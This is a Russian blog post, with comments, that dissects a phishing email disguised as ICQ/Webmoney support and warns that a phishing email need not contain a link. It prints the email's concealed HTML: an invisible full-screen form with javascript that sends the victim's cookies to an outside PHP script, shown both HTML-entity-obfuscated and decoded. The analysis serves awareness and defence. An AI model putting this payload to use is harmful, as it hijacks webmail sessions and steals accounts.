История попытки взлома электронной почты началась вот с этого твита Алаича:
Я попросил его переслать мне в почту это письмо, было интересно посмотреть, как народ нынче развлекается. Через некоторое время я получил это письмо и открыл его посмотреть. Всё и вправду так, как говорят:
Сразу же стало смешно — ну как так можно опростоволоситься с подписью? Школоло, ага. Ссылок в письме нет, это уже интересно. Открываем исходный код письма, и видим, понятное дело, что ни к ICQ, ни тем более к Webmoney Support это письмо не имеет никакого отношения:
1 |
Return-path: <webmaster@адрес_сайта.ру> |
Но это ерунда, так как в самом низу электронного письма притаился вот такой блок:
1
2
3
4 |
</div></div></div></div></div>
<form target="_self" action="javas cript:delf=d& #111cument.getEl ementById('de lf');delf.sty le.display='no ne';img=new Im age();img.src= "http://nordla nd72.ru/cor/s. php?"+document .cookie;" formtarget="_self">
<input id="delf" type=submit value="" style="filter:alpha(opacity=0); -moz-opacity:0;opacity:0;position:absolute;z-index:9999999999999; margin-left:-2000px;margin-top:-2000px;width:10000px;height:10000px;">
</form> |
Понятно, это HTML-Entities. Прогоняем через декодер HTML-Entities > UTF-8, и вот, код обретает уже более понятный вид:
1
2
3
4 |
</div></div></div></div></div>
<form target="_self" action="javascript:delf=document.getElementById('delf'); delf.style.display='none';img=new Image();img.src="http://адрес_сайта/cor/s.php?" +document.cookie;" formtarget="_self">
<input id="delf" type=submit value="" style="filter:alpha(opacity=0); -moz-opacity:0;opacity:0;position:absolute;z-index:9999999999999; margin-left:-2000px;margin-top:-2000px;width:10000px;height:10000px;">
</form> |
Итак, что происходит. Джаваскрипт берёт куки активного документа и отправляет их скрипту, находящемуся по адресу: http://адрес_сайта/cor/s.php. Там злоумышленник эти куки принимает, и дальше юзает по назначению (читай получает доступ к электронному почтовому ящику атакуемого). В этом нехорошем деле засветилась кровельная компания ООО «Нордленд» (именно её адрес стоял вместо адрес_сайта). Домен зарегистрирован в 2007 году, поэтому делаю вывод, что их или взломали, или это SEO-войны какие-то.
Данная модель взлома сработает только на тех, кто ходит в электронную почту через браузер и ставит галочку «запомнить пароль» при входе в почту. Но случай хоть и школьный, но забавный. Если бы не фейл с подписью и если бы жертва не юзала почтовый софт, а юзала бы браузер, всё могло бы закончиться гораздо печальнее и электронная почта была бы взломана.
P.S. В Твиттере высказывалась мысль о том, что, мол «ну там же ссылки нет, а раз нет ссылки — нет и фишинга». Как видите, чтобы взломать электронный почтовый ящик, в письме не обязательно должна быть ссылка. Достаточно хитрого скрипта.
Если есть вопросы, или хотите обсудить, жду в комментариях.
UPD #1: PHP-шный скрипт, воровавший куки от электронной почты, оперативно потёрли.
Автор: Алекс Форк.
Комментарии:
АлаичЪ
Спасибо Алексу за разъяснения. А еще до публикации поста Алекс позвонил мне , что меня очень удивило, кстати, и рассказал что это за потеха такая и что надо в первую очередь сделать, чтобы не .попасть под раздачу мошенников. Короче, двойной респект!
Алекс Форк
Всегда welcome :) Чем смогу — помогу.
wlad2
мне постоянно приходят такие письма и я в курсах что это.. но как мне кажется gmail умеет выключать iframe в письмах или я ошибаюсь?
Алекс Форк
Ошибаешься, т.к. iframe тут совершенно не причем.
wlad2
да я чет тупанул глянул а там пострашнее.. но все равно не могу понять разве браузеры да и сам гугл не умеют с этим боротся? у тебя лично уводили пасы?
Алекс Форк
Нет.
АлаичЪ
Знаешь что я вспомнил то. Сразу за первым письмом пришло второе. От имени якобы webmoney с содержанием в духе, вы два года назад завели себе кипер лайт и сейчас там кончается сертификат, если планируете пользоваться дальше, продлите еще на 2 года. Ссылки там на вебманевский сайт были. Но я сидел думал и решил что я вообще никогда ки пером этим не пользовался и письмо просто удалил.
Алекс Форк
Ну правильно все сделал. Если будут приходить еще какие-то подозрительные письма — присылай, разберем их на запчасти :)
wlad2
тоже вот последний месяц приходят такие месаги.. походу ломают тупо манимейкеров..
Константин
А у меня такая странность, пользуюсь яндекс.почтой через браузер (ff) и заметил неделю назад прикол, мне пишет письмо регистратор, мол повторите вопрос, мы не поняли что вы говорите, смотрю, я отправил ему письмо, на английском с какой то ссылкой потом смотрю таких писем улетело штук 10 и в каждом указано по 10 адресов из моей записной книги. Вот как так они овладели акком? Пароль сменил сразу как спалил, вроде прекратилось.
Алекс Форк
Вариантов может быть много. Угон кук, угон логина/пароля, и т.д.
Toxic_Cat
Мне регулярно приходят письма от webmaster@адрес_сайта.ру с различными текстами! Причем уже в течении нескольких месяцев!!! Почему этого вебмастера не отловят и не посадят на хрен? То от руцентра письмо, то от Webmoney, сегодня Счет на оплату пришел Охуевшие совсем стали! А знаете как я распознаю этого кидалу? У него в базе ДВА моих e-maila, соответственно два письма одинаковых мне приходит.
⇓
Поделись ссылкой на Seoded.ru с друзьями, знакомыми и собеседниками в соцсетях и на форумах! А сам сайт добавь в закладки! Так победим.